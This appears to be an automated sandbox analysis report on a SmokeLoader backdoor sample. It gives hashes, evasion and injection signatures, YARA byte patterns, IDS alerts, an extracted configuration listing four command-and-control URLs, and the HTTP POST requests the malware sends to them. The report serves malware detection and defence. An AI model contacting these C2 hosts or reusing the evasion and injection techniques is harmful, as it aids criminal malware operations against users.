Windows Analysis Report
kGSZ4dCqYh.exe

Overview

General Information

Sample name: kGSZ4dCqYh.exe
(renamed because original name is a hash value)
Original sample name: bab1912f10355b913050217669acc322.exe
Analysis ID: 1541371
MD5: bab1912f10355b913050217669acc322
SHA1: 17848e8aa5e443c06d495c500e642be0967cabe6
SHA256: 38dc7521a2e99fb4c095f74b51dadf8b10fdf680ecbcecb419e6720e8151096d
Tags: exe, Stealc, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • kGSZ4dCqYh.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\kGSZ4dCqYh.exe" MD5: BAB1912F10355B913050217669ACC322)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • dvjdfvr (PID: 5164 cmdline: C:\Users\user\AppData\Roaming\dvjdfvr MD5: BAB1912F10355B913050217669ACC322)
  • dvjdfvr (PID: 1404 cmdline: C:\Users\user\AppData\Roaming\dvjdfvr MD5: BAB1912F10355B913050217669ACC322)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. | SMOKY SPIDER | | https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
Source | Rule | Description | Author | Strings
00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

      System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\dvjdfvr, CommandLine: C:\Users\user\AppData\Roaming\dvjdfvr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dvjdfvr, NewProcessName: C:\Users\user\AppData\Roaming\dvjdfvr, OriginalFileName: C:\Users\user\AppData\Roaming\dvjdfvr, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\dvjdfvr, ProcessId: 5164, ProcessName: dvjdfvr
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T18:37:39.640493+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 189.164.127.217 | 80 | TCP
2024-10-24T18:38:58.525736+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50003 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:12.106292+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50004 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:31.867272+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 53258 | 189.164.127.217 | 80 | TCP
2024-10-24T18:39:51.793152+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 58682 | 189.164.127.217 | 80 | TCP
2024-10-24T18:40:12.354239+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 58683 | 201.124.145.196 | 80 | TCP
2024-10-24T18:40:27.315155+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 58684 | 201.124.145.196 | 80 | TCP
2024-10-24T18:40:45.531760+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 58685 | 201.124.145.196 | 80 | TCP
2024-10-24T18:41:03.377372+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 58686 | 201.124.145.196 | 80 | TCP


      AV Detection

Source: kGSZ4dCqYh.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\dvjdfvr | Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
Source: C:\Users\user\AppData\Roaming\dvjdfvr | ReversingLabs: Detection: 39%
Source: kGSZ4dCqYh.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\dvjdfvr | Joe Sandbox ML: detected
Source: kGSZ4dCqYh.exe | Joe Sandbox ML: detected
Source: kGSZ4dCqYh.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\AppData\Roaming\dvjdfvr | Code function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus | 7_2_00402780

      Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.164.127.217:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50004 -> 189.164.127.217:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58685 -> 201.124.145.196:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58682 -> 189.164.127.217:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58684 -> 201.124.145.196:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:53258 -> 189.164.127.217:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50003 -> 189.164.127.217:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58686 -> 201.124.145.196:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58683 -> 201.124.145.196:80
Source: C:\Windows\explorer.exe | Network Connect: 201.124.145.196 80
Source: C:\Windows\explorer.exe | Network Connect: 189.164.127.217 80
Source: Malware configuration extractor | URLs: http://tnc-corp.ru/tmp/index.php
Source: Malware configuration extractor | URLs: http://volisc.biz/tmp/index.php
Source: Malware configuration extractor | URLs: http://livbev.online/tmp/index.php
Source: Malware configuration extractor | URLs: http://liverds.at/tmp/index.php
Source: Joe Sandbox View | ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tkmyedfqjdrh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kvrakpmwnkdw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 128 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://krorrwetybapxgs.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nhvxjbuepegldhgi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 129 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fhnrrbktckg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 187 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gucrgvicowjmruy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 228 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gdvvxgrxcdrf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 119 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iiqfsjirxhqu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 365 | Host: tnc-corp.ru
Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lqjnthfwecsdh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 295 | Host: tnc-corp.ru
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: tnc-corp.ru
Source: global traffic | DNS traffic detected: DNS query: volisc.biz
Source: global traffic | DNS traffic detected: DNS query: livbev.online
Source: global traffic | DNS traffic detected: DNS query: liverds.at
Source: unknown | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tkmyedfqjdrh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: tnc-corp.ru
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1845946637.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1844459297.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1845010581.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1847015156.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1847015156.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843124662.0000000003700000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1847015156.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match File source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00403054 RtlCreateUserThread,NtTerminateProcess
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00402721 NtEnumerateKey,NtClose
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00403054 RtlCreateUserThread,NtTerminateProcess
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00402721 NtEnumerateKey,NtClose
